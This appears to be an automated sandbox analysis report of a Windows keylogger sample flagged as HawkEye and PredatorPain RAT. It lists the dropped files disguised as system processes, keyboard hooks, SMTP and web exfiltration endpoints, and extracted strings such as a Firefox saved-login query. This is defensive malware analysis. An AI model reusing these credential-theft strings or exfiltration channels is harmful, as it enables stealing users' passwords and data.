                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05209596
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_052077EB
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_052017F8
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then mov esp, ebp5_2_0520483B
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_0520603F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_0520A244
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_0520985B
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then call 05201B20h5_2_052094AC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_052094AC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_052014C0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05205CCE

                    Networking:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeDomain query: smtp.mail.ru
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeNetwork Connect: 94.100.180.160 587
                    May check the online IP address of the machineShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.3:49711 -> 94.100.180.160:587
                    Source: global trafficTCP traffic: 192.168.2.3:49711 -> 94.100.180.160:587
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustRSACA2018.crt0
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustRSACA2018.crl0L
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: svchost.exe, 0000000D.00000002.491272541.000001990D615000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: svchost.exe, 0000000D.00000002.491272541.000001990D615000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                    Source: svchost.exe, 0000000D.00000002.491350262.000001990D649000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://status.geotrust.com0=
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: http://whatismyipaddress.com/
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com_
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comlt
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: iExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comW
                    Source: iExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: taskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoL
                    Source: taskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsh
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: taskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: taskhost.exe, 00000005.00000003.231021953.000000000576E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/P
                    Source: iExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/T
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: taskhost.exe, 00000005.00000003.231408705.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn1
                    Source: taskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnE
                    Source: taskhost.exe, 00000005.00000003.231488771.0000000005771000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
                    Source: taskhost.exe, 00000005.00000003.231545876.0000000005751000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cntL
                    Source: iExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnz
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: svchost.exeString found in binary or memory: http://www.hackforums.net/member.php
                    Source: svchost.exe, 00000004.00000002.266893331.00000000039C4000.00000004.00000001.sdmpString found in binary or memory: http://www.hackforums.net/member.php?action=3Dprofile&uid=3D177092).=
                    Source: svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmpString found in binary or memory: http://www.hackforums.net/member.php?action=profile&uid=177092).
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/16
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
                    Source: taskhost.exe, 00000005.00000003.232528224.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Versh
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Vet
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0rsh
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/z
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/phy/
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
                    Source: vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comO
                    Source: taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: taskhost.exe, 00000005.00000003.235558162.0000000005770000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.235337554.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: taskhost.exe, 00000005.00000003.231928279.0000000005770000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: svchost.exe, 00000004.00000002.266303126.00000000039A2000.00000004.00000001.sdmpString found in binary or memory: https://biz.mail.ru)
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: https://tamina212.000webhostapp.com/data.php
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownDNS traffic detected: queries for: smtp.mail.ru
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_02AFA09A recv,5_2_02AFA09A
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\svchost.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\taskhost.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                    Contains functionality to log keystrokes (.Net Source)Show sources
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: HookKeyboard
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: HookKeyboard
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: HookKeyboard
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: HookKeyboard
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00404EA7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EA7
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary:

                    barindex
                    Yara detected PredatorPainRATShow sources
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPEMatched rule: PredatorPain Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects PredatorPain RAT Author: Kevin Breen <kevin@techanarchy.net>
